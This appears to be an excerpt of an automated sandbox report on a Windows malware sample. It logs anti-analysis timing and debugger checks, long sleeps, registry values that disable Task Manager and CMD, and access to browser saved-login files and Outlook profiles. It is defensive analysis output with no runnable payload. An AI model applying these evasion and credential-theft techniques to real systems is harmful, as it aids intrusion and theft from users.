            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeAPI/Special instruction interceptor: Address: 3A6EB24
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeAPI/Special instruction interceptor: Address: 200EB24
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeRDTSC instruction interceptor: First address: 3A321E1 second address: 3A321E1 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8418D10808h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeRDTSC instruction interceptor: First address: 1FD21E1 second address: 1FD21E1 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8418B75558h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeMemory allocated: 348C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeMemory allocated: 347F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599829Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599555Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599327Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599204Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598749Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597126Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596854Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596748Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596282Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594657Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594292Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594132Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594016Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 593891Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeWindow / User API: threadDelayed 2965Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeWindow / User API: threadDelayed 6829Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeAPI coverage: 3.3 %
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 2128Thread sleep count: 2965 > 30Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 2128Thread sleep count: 6829 > 30Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599555s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599327s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -597126s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596854s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596748s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596282s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595907s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594782s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594292s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594132s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -594016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088Thread sleep time: -593891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599829Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599555Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599327Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599204Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598749Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597500Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597266Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 597126Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596854Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596748Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596531Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596282Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595797Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594657Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594292Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594132Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 594016Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeThread delayed: delay time: 593891Jump to behavior
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8!H
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeAPI call chain: ExitProcess graph end nodegraph_0-4591
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeAPI call chain: ExitProcess graph end nodegraph_0-4749
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_6F9726B8 LdrInitializeThunk,VirtualAlloc,0_2_6F9726B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_6F971B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F971B5F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Users\user\Desktop\2CQ2zMn0hb.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR
            Source: Yara matchFile source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

            Remote Access Functionality

            barindex
